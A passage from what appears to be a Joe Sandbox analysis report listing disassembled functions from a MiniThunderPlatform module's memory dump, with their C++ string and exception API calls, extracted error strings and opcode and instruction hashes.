                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??1?$basic_string@$??4?$basic_string@H_prologV01@$?assign@?$basic_string@ExceptionThrowV12@V12@@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3122126096-0
                                                                                                                                              • Opcode ID: 2d38da08aadeb5cd31bed133c338e19f270d5124666b3114bb5fa43f2f088a00
                                                                                                                                              • Instruction ID: de704546b656f870057d17345512e6a2ab41c393ade08adb06c534630588f478
                                                                                                                                              • Opcode Fuzzy Hash: 2d38da08aadeb5cd31bed133c338e19f270d5124666b3114bb5fa43f2f088a00
                                                                                                                                              • Instruction Fuzzy Hash: F2F08C389102A5DFE714CBA4C40CB9CBBB0FB28604F00808EF49693281CBF02604C7A2
                                                                                                                                              Function 100C415E Relevance: 6.0, APIs: 4, Instructions: 27COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 100C4163
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C4182
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C4192
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C41A2
                                                                                                                                                • Part of subcall function 100C3D06: ??3@YAXPAX@Z.MSVCR71(?,?,?,?,?,100C40F3), ref: 100C3D1D
                                                                                                                                                • Part of subcall function 100BCF20: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00000000,1024EB44,000000FF,1008A646), ref: 100BCF4E
                                                                                                                                                • Part of subcall function 100BCF20: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00000000,1024EB44,000000FF,1008A646), ref: 100BCF5C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??3@H_prolog
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3597635974-0
                                                                                                                                              • Opcode ID: fa6e13655b19a80ac556172cc587f8195306cd523836ac35495d497c1480501b
                                                                                                                                              • Instruction ID: 76bb305c378cbcf419f8a1dcccdf2526ba41436f4debfb258e67e9b6248a8ae7
                                                                                                                                              • Opcode Fuzzy Hash: fa6e13655b19a80ac556172cc587f8195306cd523836ac35495d497c1480501b
                                                                                                                                              • Instruction Fuzzy Hash: 34F03C349106A5DAE724DBA4C55CB9DBBB4EB24604F10828EE45B53282CBB02608CB61
                                                                                                                                              Function 1002C2D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(not utf-8), ref: 1002C301
                                                                                                                                                • Part of subcall function 1002BD70: ??0exception@@QAE@XZ.MSVCR71(?,?,00000000,102423C9,000000FF,1021B19D,00000000,?,10056267), ref: 1002BD8D
                                                                                                                                                • Part of subcall function 1002BD70: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1002BDA9
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B6AA0), ref: 1002C323
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0exception@@ExceptionThrowV01@@
                                                                                                                                              • String ID: not utf-8
                                                                                                                                              • API String ID: 113201077-4126474262
                                                                                                                                              • Opcode ID: 0b0849ec9032ad7d2ca08ac6d9c1031fd63a2922725a182efedb8fbd21986e86
                                                                                                                                              • Instruction ID: 368660a87cb1470bcb45f49940bba7c6ba8e7960a04fdf2c8f6dacdf5a86f6e4
                                                                                                                                              • Opcode Fuzzy Hash: 0b0849ec9032ad7d2ca08ac6d9c1031fd63a2922725a182efedb8fbd21986e86
                                                                                                                                              • Instruction Fuzzy Hash: 7231F9356087498FC314CF58E890B9AF3E5FF85754F848E1DE49543380D776AA09CB82
                                                                                                                                              Function 100BD3B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 100BD130: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(buffer is insufficient to write!,?,?,?,?,1024EB59,000000FF,100BD3E3,?,?,?,1024EB59,000000FF,1008A7E2,?,?), ref: 100BD15F
                                                                                                                                                • Part of subcall function 100BD130: _CxxThrowException.MSVCR71(?,102C95B0), ref: 100BD185
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(buffer is insufficient to write!,?,?,?,1024EB59,000000FF,1008A7E2,?,?,?,?), ref: 100BD3F5
                                                                                                                                                • Part of subcall function 100EABC0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 100EABF6
                                                                                                                                                • Part of subcall function 100EABC0: ??0exception@@QAE@ABQBD@Z.MSVCR71(?), ref: 100EAC24
                                                                                                                                                • Part of subcall function 100EABC0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100EAC39
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102C95B0), ref: 100BD41B
                                                                                                                                              Strings
                                                                                                                                              • buffer is insufficient to write!, xrefs: 100BD3EC
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$ExceptionThrow$??0exception@@??1?$basic_string@
                                                                                                                                              • String ID: buffer is insufficient to write!
                                                                                                                                              • API String ID: 900035782-1936633475
                                                                                                                                              • Opcode ID: d33b37e6a91cf1b34611d3b7944843c4c8c6f0bfffd12ccdb8d1f2b31b77419b
                                                                                                                                              • Instruction ID: 6d73136c05deb39de3185fa15067abb0b69ae51a370060fb026e46ce6ac739e5
                                                                                                                                              • Opcode Fuzzy Hash: d33b37e6a91cf1b34611d3b7944843c4c8c6f0bfffd12ccdb8d1f2b31b77419b
                                                                                                                                              • Instruction Fuzzy Hash: 2D216A75A04200DFCB18DF28C980A5AF7E5FB98620F44892EFC5A97385E734EC04CB92
                                                                                                                                              Function 100C1580 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(?,00000000,00000001,?,00000001,?,?), ref: 100C15A8
                                                                                                                                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(?,00000000,00000001,?,00000001,?,?), ref: 100C1603
                                                                                                                                                • Part of subcall function 100C14C0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,100C15F3,?,00000001,?,?,1009224A,?,?,?,?), ref: 100C14EF
                                                                                                                                                • Part of subcall function 100C14C0: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 100C150F
                                                                                                                                                • Part of subcall function 100C14C0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?), ref: 100C1536
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?find@?$basic_string@$??0?$basic_string@??1?$basic_string@?assign@?$basic_string@V12@V12@@
                                                                                                                                              • String ID: ?
                                                                                                                                              • API String ID: 3093974851-1684325040
                                                                                                                                              • Opcode ID: 7a5680610f2eab284a5fed8efe222b83cda5e617b4bd0f7286a76c4ff667fe13
                                                                                                                                              • Instruction ID: 8b72c374fccc4f010bd5b449e26bf678d51737e06fb71f8646da365a5379cf16
                                                                                                                                              • Opcode Fuzzy Hash: 7a5680610f2eab284a5fed8efe222b83cda5e617b4bd0f7286a76c4ff667fe13
                                                                                                                                              • Instruction Fuzzy Hash: 7C11E7353007109BD614CB64D884BAE73EAEFC9B10F10499DF146D7291CB70A849C761
                                                                                                                                              Function 100BD5D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 100BD130: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(buffer is insufficient to write!,?,?,?,?,1024EB59,000000FF,100BD3E3,?,?,?,1024EB59,000000FF,1008A7E2,?,?), ref: 100BD15F
                                                                                                                                                • Part of subcall function 100BD130: _CxxThrowException.MSVCR71(?,102C95B0), ref: 100BD185
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(buffer is insufficient to write!), ref: 100BD60F
                                                                                                                                                • Part of subcall function 100EABC0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 100EABF6
                                                                                                                                                • Part of subcall function 100EABC0: ??0exception@@QAE@ABQBD@Z.MSVCR71(?), ref: 100EAC24
                                                                                                                                                • Part of subcall function 100EABC0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100EAC39
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102C95B0), ref: 100BD635
                                                                                                                                              Strings
                                                                                                                                              • buffer is insufficient to write!, xrefs: 100BD606
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$ExceptionThrow$??0exception@@??1?$basic_string@
                                                                                                                                              • String ID: buffer is insufficient to write!
                                                                                                                                              • API String ID: 900035782-1936633475
                                                                                                                                              • Opcode ID: f63a0858d9f63c92f5bbc876c5c6693d0b66f604c98fb3cd82b43cbc29b8747e
                                                                                                                                              • Instruction ID: b41e50b9aaccbe556a12fbf3cbfc92cdd55e207dd8fc2aad088f364bc7febfdf
                                                                                                                                              • Opcode Fuzzy Hash: f63a0858d9f63c92f5bbc876c5c6693d0b66f604c98fb3cd82b43cbc29b8747e
                                                                                                                                              • Instruction Fuzzy Hash: 83115B75504200EFCB08DF28C980A5AB7E9FB88724F44C92EF80A9B245D774E804CB61
                                                                                                                                              Function 10015639 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(map/set<T> too long), ref: 10015641
                                                                                                                                                • Part of subcall function 10001598: __EH_prolog.LIBCMT ref: 1000159D
                                                                                                                                                • Part of subcall function 10001598: ??0exception@@QAE@XZ.MSVCR71(?,?,1001E6D1,?,?,?,?), ref: 100015A9
                                                                                                                                                • Part of subcall function 10001598: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,1001E6D1,?,?,?,?), ref: 100015BF
                                                                                                                                              • _CxxThrowException.MSVCR71 ref: 10015667
                                                                                                                                                • Part of subcall function 10015545: __EH_prolog.LIBCMT ref: 1001554A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@H_prologU?$char_traits@V?$allocator@$??0exception@@ExceptionThrowV01@@
                                                                                                                                              • String ID: map/set<T> too long
                                                                                                                                              • API String ID: 1391971735-1285458680
                                                                                                                                              • Opcode ID: a002f178a2b47248cd4da10a622b69cbd970e721b8f4628dfc60baf05d5b4970
                                                                                                                                              • Instruction ID: 9e9ae5254743f9710cc8d78efb0b636acd979b5f35ff6c31873d8ed071f55222
                                                                                                                                              • Opcode Fuzzy Hash: a002f178a2b47248cd4da10a622b69cbd970e721b8f4628dfc60baf05d5b4970
                                                                                                                                              • Instruction Fuzzy Hash: 39111375600244EFC711CF88C984AD9FBF4FB09355F498159E81AAF651D771ED50CBA0
                                                                                                                                              Function 100892A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN,?,?,?,?), ref: 10089313
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 1008933B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 10089358
                                                                                                                                              • ??_V@YAXPAX@Z.MSVCR71(?), ref: 10089374
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN), ref: 100893A4
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 100893CC
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN), ref: 100893DC
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 10089404
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN), ref: 10089414
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 1008943C
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN,?,?), ref: 1008944C
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 10089474
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN), ref: 10089484
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 100894AC
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN,?,00000000), ref: 100894BC
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC,?,00000000), ref: 100894E4
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN,?,00000000), ref: 100894F4
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC,?,00000000), ref: 1008951C
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN), ref: 1008952C
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 10089554
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN,00000000), ref: 10089564
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$ExceptionThrow$??1?$basic_string@
                                                                                                                                              • String ID: S
                                                                                                                                              • API String ID: 687652020-543223747
                                                                                                                                              • Opcode ID: b188b23b1d081b1bb58b8c1037ac9ab940659f60fed9f2f41afee709b6f0d5b2
                                                                                                                                              • Instruction ID: ea1c1417fdaf8e1e167d4f1a0c1484330ca21758ccd825051f4acddc0729eea8
                                                                                                                                              • Opcode Fuzzy Hash: b188b23b1d081b1bb58b8c1037ac9ab940659f60fed9f2f41afee709b6f0d5b2
                                                                                                                                              • Instruction Fuzzy Hash: 01115630A01648CFDB10CF14C58479AB7F0FF45314F1881ADD48A6B281CB36AE49CB41
                                                                                                                                              Function 1002412A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalH_prologLeaveSection
                                                                                                                                              • String ID: name
                                                                                                                                              • API String ID: 1127631123-1579384326
                                                                                                                                              • Opcode ID: 589157709b7c399e2b4c823b1cb453c2a3f7a0a03b9d8b7200b30d16ce5de378
                                                                                                                                              • Instruction ID: 0361fa4fcca0a77cfcedaf7b56b5dc3e60f52dca3a33370967eebc0211660263
                                                                                                                                              • Opcode Fuzzy Hash: 589157709b7c399e2b4c823b1cb453c2a3f7a0a03b9d8b7200b30d16ce5de378
                                                                                                                                              • Instruction Fuzzy Hash: EF017C36600110EBC719DF68DC49BAEB3B8EF54210B50811AF81AE7251DF34FD54CA50
                                                                                                                                              Function 100BD270 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(buffer is insufficient to write!,1008A800,?,?,?,?,?,?), ref: 100BD29F
                                                                                                                                                • Part of subcall function 100EABC0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 100EABF6
                                                                                                                                                • Part of subcall function 100EABC0: ??0exception@@QAE@ABQBD@Z.MSVCR71(?), ref: 100EAC24
                                                                                                                                                • Part of subcall function 100EABC0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100EAC39
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102C95B0), ref: 100BD2C5
                                                                                                                                              Strings
                                                                                                                                              • buffer is insufficient to write!, xrefs: 100BD296
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??0exception@@??1?$basic_string@ExceptionThrow
                                                                                                                                              • String ID: buffer is insufficient to write!
                                                                                                                                              • API String ID: 3827206194-1936633475
                                                                                                                                              • Opcode ID: d2d6404c9fd1e394a2e8ba0b90f22d6ee74e9fbf3d058e2de43753bd433301e0
                                                                                                                                              • Instruction ID: ebbc4190c85e9812df72464f77fee8a6a13d68e4700a2c0100f8826676d56bb1
                                                                                                                                              • Opcode Fuzzy Hash: d2d6404c9fd1e394a2e8ba0b90f22d6ee74e9fbf3d058e2de43753bd433301e0
                                                                                                                                              • Instruction Fuzzy Hash: 95112A7A5052409FC308CF08C944E46F7E5FB99720F16CA6EF459973A1D734E841CB85
                                                                                                                                              Function 100BD310 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(buffer is insufficient to read!), ref: 100BD33F
                                                                                                                                                • Part of subcall function 100EAB20: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,00000000,1024EB59,000000FF,1008BC84), ref: 100EAB56
                                                                                                                                                • Part of subcall function 100EAB20: ??0exception@@QAE@ABQBD@Z.MSVCR71(?), ref: 100EAB84
                                                                                                                                                • Part of subcall function 100EAB20: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100EAB99
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102C95EC), ref: 100BD365
                                                                                                                                              Strings
